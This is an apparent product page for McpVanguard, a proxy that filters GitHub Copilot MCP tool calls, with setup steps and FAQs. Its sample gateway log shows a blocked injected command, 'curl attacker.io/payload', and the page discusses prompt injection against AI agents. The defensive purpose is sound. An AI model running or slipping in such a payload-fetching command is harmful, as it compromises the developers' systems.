All Integrations
GitHub Copilot

Secure Copilot's MCP tool servers

McpVanguard applies layered policy to Copilot extension and agent MCP traffic routed through the proxy, returning an explicit decision before the selected tool call reaches the server.

McpVanguard — Copilot gateway
$ vanguard sse --profile balanced --server uvx mcp-server-github --port 3000
▲ McpVanguard SSE gateway started on :3000
Profile: balanced | Listening for Copilot connections
[14:20:01]ALLOWlist_repos → user/provnai
[14:20:02]ALLOWcreate_pull_request → main
[14:20:09]BLOCKdelete_repository → user/productionPOLICY
[14:20:14]BLOCKpush_commit → curl attacker.io/payloadINJECTION

Tool allowlisting

Use configured tool and argument policies to constrain which GitHub operations a routed workflow may request. Destructive examples still require deployment-specific verification.

Injection-resistant

Configured checks can surface suspicious instruction patterns in routed arguments; this is not a universal prompt-injection guarantee.

CI-compatible

Run McpVanguard wherever the supported MCP transport and deployment configuration are available; verify your CI or cloud setup before production use.

Set up in 3 steps

McpVanguard runs as an SSE gateway that Copilot extensions connect to over HTTP.

1

Install McpVanguard

pip install mcp-vanguard
2

Start the secured SSE gateway

vanguard sse \
  --profile balanced \
  --server uvx mcp-server-github \
  --port 3000
3

Point your Copilot extension

# copilot-extension config
{
  "mcpServer": {
    "url": "http://localhost:3000/sse"
  }
}

Common questions

How do I secure GitHub Copilot MCP servers with McpVanguard?

Install McpVanguard (pip install mcp-vanguard) and configure it to wrap the MCP server used by your Copilot workflow. Tool calls routed through the proxy are evaluated before they reach that server.

Does McpVanguard work with GitHub Copilot Extensions?

Copilot extensions or MCP-backed agents can use McpVanguard when their MCP traffic can be routed through the proxy. Confirm the extension transport and configuration before relying on this integration.

Can I use McpVanguard in a GitHub Actions CI environment?

McpVanguard runs as a Python process and can be installed alongside an MCP server in supported CI or cloud environments. Verify the transport, permissions, and deployment configuration before using it in a production runner.

Research Newsletter

Stay ahead of agentic threats

Follow our latest research on MCP vulnerabilities, defensive architecture, and verifiable execution. We publish updates on the site and in the RSS feed.